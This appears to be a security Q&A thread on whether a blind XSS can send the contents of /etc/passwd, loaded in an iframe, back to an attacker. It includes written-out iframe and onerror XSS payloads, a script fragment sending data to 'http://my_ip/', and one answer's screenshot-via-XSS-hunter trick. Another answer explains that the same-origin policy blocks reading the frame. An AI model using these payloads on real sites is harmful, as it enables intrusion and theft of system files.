3

When I do one of these payloads, I can see /etc/passwd:

<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

However, here I got blind XSS, so I need to send the iframe text back to me, so I need to grab the iframe text and do something like `<script>document.location.href = 'http://my_ip/' + iframe_text`

How can I get the iframe text?

Peter Mortensen
  • 877
  • 5
  • 10
eyal
  • 73
  • 1
  • 3
  • 4
    You can't read local files via blind XSS – yeah_well Dec 30 '20 at 06:20
  • 1
    I did, I read local files with blind XSS... see this code `` – eyal Dec 30 '20 at 06:22
  • 2
    We need more context. Where (to what system) are you injecting this, and who loads/displays the html in their browser? – Bergi Dec 30 '20 at 16:27
  • 2
    @eyal That didn't read the file. It loaded the file into an iframe, which is in a different security origin to the rest of the page. The browser's same origin policy (SOP) prevents scripts on the page from reading the iframe contents. – Polynomial Dec 31 '20 at 00:31

2 Answers

15
<iframe src=file:///etc/passwd></iframe>

This displays a local file in the browser inside a separate iframe. This iframe has a different origin than the main frame. Due to the same-origin policy it is not possible to read the iframe content from the main frame, no matter whether XSS is involved or not.

Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424
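The origin comparison behind this answer, as an added illustration (not code from the answer or from any browser): a same-origin check in the sense of the WHATWG URL/HTML specs, run against the page's own URLs. It assumes a Node.js runtime with the global `URL` class, and it assumes (as modern browsers do by default) that every `file:` URL has its own opaque origin.

```javascript
// Added example: why the main frame cannot read an iframe loaded from
// file:///etc/passwd. Assumes Node.js >= 10 (global URL).

// Origin as a browser computes it: scheme + host + port for http(s) and
// similar schemes; for file:, data: and other non-tuple schemes the
// origin is opaque and the URL API serialises it as the string "null".
function originOf(urlString) {
  return new URL(urlString).origin;
}

// Two URLs are same-origin only when both have tuple origins and the
// scheme, host and port all match. An opaque origin is never the same as
// anything, not even another opaque origin (assumption: modern browser
// defaults, where each file: document is isolated from every other).
function isSameOrigin(urlA, urlB) {
  const a = originOf(urlA);
  const b = originOf(urlB);
  if (a === 'null' || b === 'null') return false;
  return a === b;
}

// Models the check a browser performs on frame.contentDocument: the
// document is handed back only for a same-origin frame; otherwise the
// access throws a SecurityError and the script never sees the content.
function readFrameDocument(pageUrl, frameUrl, frameText) {
  if (!isSameOrigin(pageUrl, frameUrl)) {
    throw new Error(
      'SecurityError: Blocked a frame with origin "' + originOf(pageUrl) +
      '" from accessing a cross-origin frame.'
    );
  }
  return frameText;
}

// Constructed sample: an injected page at http://app.example framing a
// local file. The frame text is a placeholder, never the real file.
function demo() {
  const page = 'http://app.example/profile?name=injected';
  try {
    return readFrameDocument(page, 'file:///etc/passwd', '<placeholder>');
  } catch (e) {
    return e.message; // the SecurityError text, not the file content
  }
}

module.exports = { originOf, isSameOrigin, readFrameDocument, demo };
```

Running `demo()` yields the SecurityError message rather than any file text, which is exactly the barrier the answer describes; the same check also explains why two different `file:` documents cannot read each other.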
-1

If you are sure about the Blind XSS, you have no way to retrieve the content of /etc/passwd to your server, but you do have a trick to see the result.

You just need to inject a Blind XSS payload from your XSS hunter after injecting:

'<iframe src=file:///etc/passwd></iframe><YOUR BXSS PAYLOAD HERE>'

This will cause the payload to execute after the iframe injection, and then you will be able to see the iframe content at the XSS hunter, in the screenshot that you'll get back in your account.

galoget
  • 1,414
  • 1
  • 9
  • 15